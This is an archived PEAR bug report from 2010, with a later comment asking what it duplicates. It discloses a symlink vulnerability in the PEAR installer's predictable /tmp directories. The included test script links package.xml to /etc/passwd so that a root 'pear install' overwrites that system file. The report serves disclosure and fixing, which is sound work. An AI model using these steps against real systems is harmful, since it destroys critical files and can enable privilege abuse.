FAQ
Edit report at https://pear.php.net/bugs/bug.php?id=18055&edit=1

  ID: 18055
  Comment by: math.parent@gmail.com
  Reported By: ondrej@sury.org
  Summary: [SECURITY]: Symlink attack
  Status: Duplicate
  Type: Bug
  Package: PEAR
  Operating System: Linux
  Package Version: 1.9.1
  PHP Version: 5.3.3
  Roadmap Versions:
  New Comment:

Hello,

This bug is marked as duplicate. But duplicate of what?


Previous Comments:
------------------------------------------------------------------------

[2010-11-15 23:41:09] dufuz

-Status: Open
+Status: Duplicate


------------------------------------------------------------------------

[2010-11-14 15:24:37] ondrej

Description:
------------
There's symlink vulnerability when doing PEAR install. PEAR
should really be using $(mktemp) for it's directories like
download_dir, cache_dir and tmp_dir, and check whether the
directory doesn't exists.

Test script:
---------------
# pear config-show | grep /tmp
PEAR Installer cache directory cache_dir /tmp/pear/cache
PEAR Installer download download_dir
/tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory temp_dir /tmp/pear/temp

# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
/tmp/buildd/php5-5.3.3/pear-build-download

# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout

# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10


# head /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<package packagerversion="1.9.1" version="2.0"
xmlns="http://pear.php.net/dtd/package-2.0"
xmlns:tasks="http://pear.php.net/dtd/tasks-1.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0
http://pear.php.net/dtd/tasks-1.0.xsd
http://pear.php.net/dtd/package-2.0
" rel="nofollow">http://pear.php.net/dtd/package-2.0.xsd">
  <name>Net_Socket</name>
  <channel>pear.php.net</channel>
  <summary>Network Socket Interface</summary>
  <description>Net_Socket is a class interface to TCP sockets. It
provides blocking
   and non-blocking operation, with different reading and writing modes
   (byte-wise, block-wise, line-wise and special formats like network
   byte-order ip addresses).</description>
  <lead>


Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating right directories and
symlinks.

------------------------------------------------------------------------

Search Discussions

Related Discussions

Discussion Navigation
viewthread | post
posts ‹ prev | 1 of 1 | next ›
Discussion Overview
grouppear-bugs @
categoriesphp
postedOct 20, '15 at 4:14a
activeOct 20, '15 at 4:14a
posts1
users1
websitepear.php.net

1 user in discussion

Math Parent: 1 post

People

Translate

site design / logo © 2022 Grokbase